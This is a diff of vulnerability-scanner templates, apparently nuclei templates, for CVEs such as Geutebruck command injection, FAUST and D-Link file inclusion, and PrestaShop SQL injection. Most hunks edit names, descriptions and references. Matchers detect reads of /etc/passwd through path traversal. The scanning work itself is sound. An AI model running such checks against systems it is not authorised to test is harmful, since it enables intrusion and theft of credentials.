cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 7.8
|
cvss-score: 7.8
|
||||||
|
@ -26,9 +26,6 @@ requests:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
|
@ -36,3 +33,9 @@ requests:
|
||||||
- "Firmware Version"
|
- "Firmware Version"
|
||||||
- "Firmware Build Time"
|
- "Firmware Build Time"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,14 +1,15 @@
|
||||||
id: CVE-2021-33544
|
id: CVE-2021-33544
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Geutebruck RCE
|
name: Geutebruck - Remote Command Injection
|
||||||
author: gy741
|
author: gy741
|
||||||
severity: high
|
severity: high
|
||||||
description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
|
description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
|
||||||
reference:
|
reference:
|
||||||
- https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
|
- https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
|
||||||
- https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/
|
- https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/
|
||||||
- https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03
|
- https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-33544
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 7.2
|
cvss-score: 7.2
|
||||||
|
@ -28,3 +29,5 @@ requests:
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -4,12 +4,12 @@ info:
|
||||||
name: FAUST iServer 9.0.018.018.4 - Local File Inclusion
|
name: FAUST iServer 9.0.018.018.4 - Local File Inclusion
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: high
|
severity: high
|
||||||
description: An issue was discovered in FAUST iServer before 9.0.019.019.7. For each URL request, it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.
|
description: FAUST iServer before 9.0.019.019.7 is susceptible to local file inclusion because for each URL request it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.
|
||||||
reference:
|
reference:
|
||||||
- https://cxsecurity.com/issue/WLB-2022010120
|
- https://cxsecurity.com/issue/WLB-2022010120
|
||||||
- https://www.cvedetails.com/cve/CVE-2021-34805
|
|
||||||
- http://packetstormsecurity.com/files/165701/FAUST-iServer-9.0.018.018.4-Local-File-Inclusion.html
|
- http://packetstormsecurity.com/files/165701/FAUST-iServer-9.0.018.018.4-Local-File-Inclusion.html
|
||||||
- http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver
|
- http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-34805
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
@ -35,3 +35,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,15 +1,15 @@
|
||||||
id: CVE-2021-36748
|
id: CVE-2021-36748
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: PrestaHome Blog for PrestaShop - SQL Injection
|
name: PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection
|
||||||
author: whoever
|
author: whoever
|
||||||
severity: high
|
severity: high
|
||||||
description: Blog for PrestaShop by PrestaHome < 1.7.8 is vulnerable to a SQL injection (blind) via sb_category parameter.
|
description: PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-36748
|
|
||||||
- https://blog.sorcery.ie/posts/ph_simpleblog_sqli/
|
- https://blog.sorcery.ie/posts/ph_simpleblog_sqli/
|
||||||
- https://alysum5.promokit.eu/promokit/documentation/blog/
|
- https://alysum5.promokit.eu/promokit/documentation/blog/
|
||||||
- https://blog.sorcery.ie
|
- https://blog.sorcery.ie
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-36748
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
@ -37,3 +37,5 @@ requests:
|
||||||
- "contains(tolower(all_headers_2), 'index.php?controller=404')"
|
- "contains(tolower(all_headers_2), 'index.php?controller=404')"
|
||||||
- "len(body_2) == 0"
|
- "len(body_2) == 0"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,23 +1,23 @@
|
||||||
id: CVE-2021-37589
|
id: CVE-2021-37589
|
||||||
info:
|
info:
|
||||||
name: Virtua Software Cobrança - Firebird Blind SQL Injection
|
name: Virtua Software Cobranca <12R - Blind SQL Injection
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Virtua Cobranca before 12R allows SQL Injection on the login page.
|
Virtua Cobranca before 12R allows blind SQL injection on the login page.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589
|
- https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589
|
||||||
- https://www.virtuasoftware.com.br/
|
- https://www.virtuasoftware.com.br/
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-37589
|
|
||||||
- https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br
|
- https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-37589
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2021-37589
|
cve-id: CVE-2021-37589
|
||||||
cwe-id: CWE-89
|
cwe-id: CWE-89
|
||||||
metadata:
|
metadata:
|
||||||
|
verified: true
|
||||||
shodan-query: http.favicon.hash:876876147
|
shodan-query: http.favicon.hash:876876147
|
||||||
verified: "true"
|
|
||||||
tags: cve,cve2021,virtua,sqli
|
tags: cve,cve2021,virtua,sqli
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
@ -47,12 +47,15 @@ requests:
|
||||||
req-condition: true
|
req-condition: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- "status_code_2 == 500 && status_code_3 == 200"
|
|
||||||
|
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'contains(body_3, "Os parametros não estão informados corretamente")'
|
- 'contains(body_3, "Os parametros não estão informados corretamente")'
|
||||||
- 'contains(body_3, "O CNPJ dos parametro não está informado corretamente")'
|
- 'contains(body_3, "O CNPJ dos parametro não está informado corretamente")'
|
||||||
condition: or
|
condition: or
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "status_code_2 == 500 && status_code_3 == 200"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,22 +1,22 @@
|
||||||
id: CVE-2021-39312
|
id: CVE-2021-39312
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal
|
name: WordPress True Ranker <2.2.4 - Local File Inclusion
|
||||||
author: DhiyaneshDK
|
author: DhiyaneshDK
|
||||||
severity: high
|
severity: high
|
||||||
description: The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file.
|
description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion.
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79
|
- https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-39312
|
|
||||||
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312
|
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312
|
||||||
- https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php
|
- https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-39312
|
||||||
remediation: Fixed in version 2.2.4
|
remediation: Fixed in version 2.2.4
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2021-39312
|
cve-id: CVE-2021-39312
|
||||||
cwe-id: CWE-22,CWE-22
|
cwe-id: CWE-22,CWE-22
|
||||||
tags: lfi,wp,wordpress,wp-plugin,unauth,lfr,cve,cve2021
|
tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,unauth,lfr
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -40,3 +40,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,21 +1,22 @@
|
||||||
id: CVE-2021-39316
|
id: CVE-2021-39316
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Wordpress DZS Zoomsounds <= 6.50 - Arbitrary File Retrieval
|
name: WordPress DZS Zoomsounds <=6.50 - Local File Inclusion
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using a directory traversal in the `link` parameter.
|
description: WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
|
- https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
|
||||||
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316
|
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316
|
||||||
- http://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html
|
- http://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-39316
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2021-39316
|
cve-id: CVE-2021-39316
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
tags: wordpress,cve2021,cve,lfi,wp-plugin,zoomsounds
|
tags: cve,cve2021,wp,wordpress,lfi,wp-plugin,zoomsounds
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -32,3 +33,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,11 +1,11 @@
|
||||||
id: CVE-2021-40149
|
id: CVE-2021-40149
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Reolink E1 Zoom Camera - Rsa Key Information Disclosure
|
name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure
|
||||||
author: For3stCo1d
|
author: For3stCo1d
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key disclosure vulnerability.
|
Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.
|
||||||
reference:
|
reference:
|
||||||
- https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
|
- https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
|
||||||
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
|
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
|
||||||
|
@ -33,3 +33,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,15 +1,15 @@
|
||||||
id: CVE-2021-40822
|
id: CVE-2021-40822
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Geoserver - SSRF
|
name: Geoserver - Server-Side Request Forgery
|
||||||
author: For3stCo1d
|
author: For3stCo1d
|
||||||
severity: high
|
severity: high
|
||||||
description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows SSRF via the option for setting a proxy host.
|
description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.
|
||||||
reference:
|
reference:
|
||||||
- https://gccybermonks.com/posts/cve-2021-40822/
|
- https://gccybermonks.com/posts/cve-2021-40822/
|
||||||
- https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3
|
- https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40822
|
|
||||||
- https://github.com/geoserver/geoserver/releases
|
- https://github.com/geoserver/geoserver/releases
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-40822
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
@ -18,7 +18,7 @@ info:
|
||||||
metadata:
|
metadata:
|
||||||
fofa-query: app="GeoServer"
|
fofa-query: app="GeoServer"
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve2021,ssrf,geoserver,cve
|
tags: cve,cve2021,ssrf,geoserver
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -43,3 +43,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
||||||
|
|
|
@ -1,13 +1,17 @@
|
||||||
id: CVE-2021-41282
|
id: CVE-2021-41282
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: pfSense Arbitrary File Write to RCE
|
name: pfSense - Arbitrary File Write
|
||||||
author: cckuailong
|
author: cckuailong
|
||||||
severity: high
|
severity: high
|
||||||
description: diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (i.e., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.
|
description: |
|
||||||
|
diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.
|
||||||
|
remediation: |
|
||||||
|
Upgrade to pfSense CE software version 2.6.0 or later, or pfSense Plus software version 22.01 or later.
|
||||||
reference:
|
reference:
|
||||||
- https://www.shielder.it/advisories/pfsense-remote-command-execution/
|
- https://www.shielder.it/advisories/pfsense-remote-command-execution/
|
||||||
- https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/
|
- https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/
|
||||||
|
- https://docs.netgate.com/downloads/pfSense-SA-22_02.webgui.asc
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41282
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-41282
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
@ -53,3 +57,5 @@ requests:
|
||||||
- "contains(body, 'c3959e8a43f1b39b0d1255961685a238')"
|
- "contains(body, 'c3959e8a43f1b39b0d1255961685a238')"
|
||||||
- "status_code==200"
|
- "status_code==200"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
# Enhanced by cs 06/30/2022
|
||||||
|
|
|
@ -1,18 +1,18 @@
|
||||||
id: CVE-2021-44103
|
id: CVE-2021-42192
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: KOGA 0.14.9 - Privilege Escalation
|
name: KONGA 0.14.9 - Privilege Escalation
|
||||||
author: rschio
|
author: rschio
|
||||||
severity: high
|
severity: high
|
||||||
description: Vertical Privilege Escalation in KONGA 0.14.9 allows attackers to higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter.
|
description: KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter.
|
||||||
reference:
|
reference:
|
||||||
- http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
|
- http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
|
||||||
- https://www.exploit-db.com/exploits/50521
|
- https://www.exploit-db.com/exploits/50521
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44103
|
- hhttps://nvd.nist.gov/vuln/detail/CVE-2021-42192
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 8.8
|
cvss-score: 8.8
|
||||||
cve-id: CVE-2021-44103
|
cve-id: CVE-2021-42192
|
||||||
cwe-id: CWE-269
|
cwe-id: CWE-269
|
||||||
tags: cve,cve2021,konga,authenticated
|
tags: cve,cve2021,konga,authenticated
|
||||||
|
|
||||||
|
@ -77,3 +77,5 @@ requests:
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '"token":"(.*)"'
|
- '"token":"(.*)"'
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/30
|
|
@ -1,16 +1,16 @@
|
||||||
id: CVE-2021-45968
|
id: CVE-2021-45968
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Pascom CPS Path Traversal
|
name: Pascom CPS - Local File Inclusion
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Pascom version packaged with Cloud Phone System (CPS)
|
Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability.
|
||||||
versions before 7.20 contains a known path traversal issue
|
|
||||||
reference:
|
reference:
|
||||||
- https://kerbit.io/research/read/blog/4
|
- https://kerbit.io/research/read/blog/4
|
||||||
- https://www.pascom.net/doc/en/release-notes/
|
- https://www.pascom.net/doc/en/release-notes/
|
||||||
- https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html
|
- https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-45968
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
@ -37,5 +37,7 @@ requests:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- "status_code_2 != status_code_1"
|
- "status_code_2 != status_code_1"
|
||||||
- "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS
|
- "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -4,17 +4,17 @@ info:
|
||||||
name: D-Link DAP-1620 - Local File Inclusion
|
name: D-Link DAP-1620 - Local File Inclusion
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: high
|
severity: high
|
||||||
description: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
|
description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
|
||||||
reference:
|
reference:
|
||||||
- https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing
|
- https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing
|
||||||
- https://www.cvedetails.com/cve/CVE-2021-46381/
|
|
||||||
- https://www.dlink.com/en/security-bulletin/
|
- https://www.dlink.com/en/security-bulletin/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-46381
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2021-46381
|
cve-id: CVE-2021-46381
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
tags: cve,cve2021,dlink,lfi
|
tags: cve,cve2021,dlink,lfi,router
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
|
@ -28,3 +28,5 @@ requests:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0:"
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,22 +1,23 @@
|
||||||
id: CVE-2021-46417
|
id: CVE-2021-46417
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Franklin Fueling Systems Colibri Controller Module - Local File Inclusion
|
name: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion
|
||||||
author: For3stCo1d
|
author: For3stCo1d
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Insecure handling of a download function leads to disclosure of internal files due to path traversal with root privileges in Franklin Fueling Systems Colibri Controller Module 1.8.19.8580.
|
Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.
|
||||||
reference:
|
reference:
|
||||||
- https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html
|
- https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46417
|
|
||||||
- https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R
|
- https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R
|
||||||
- http://packetstormsecurity.com/files/166610/FFS-Colibri-Controller-Module-1.8.19.8580-Directory-Traversal.html
|
- http://packetstormsecurity.com/files/166610/FFS-Colibri-Controller-Module-1.8.19.8580-Directory-Traversal.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-46417
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2021-46417
|
cve-id: CVE-2021-46417
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
metadata:
|
metadata:
|
||||||
|
verified: true
|
||||||
shodan-query: http.html:"Franklin Fueling Systems"
|
shodan-query: http.html:"Franklin Fueling Systems"
|
||||||
tags: cve,cve2021,franklinfueling,lfi
|
tags: cve,cve2021,franklinfueling,lfi
|
||||||
|
|
||||||
|
@ -30,3 +31,5 @@ requests:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0:"
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -4,15 +4,16 @@ info:
|
||||||
name: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect
|
name: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect
|
||||||
author: akincibor
|
author: akincibor
|
||||||
severity: high
|
severity: high
|
||||||
description: The plugin does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action available to both unauthenticated and authenticated users.
|
description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users).
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb
|
- https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb
|
||||||
tags: cve,cve2022,wp-plugin,redirect,wordpress
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0165
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 8.80
|
cvss-score: 8.80
|
||||||
cve-id: CVE-2022-0165
|
cve-id: CVE-2022-0165
|
||||||
cwe-id: CWE-601
|
cwe-id: CWE-601
|
||||||
|
tags: cve,cve2022,wp-plugin,redirect,wordpress,wp
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -24,3 +25,5 @@ requests:
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
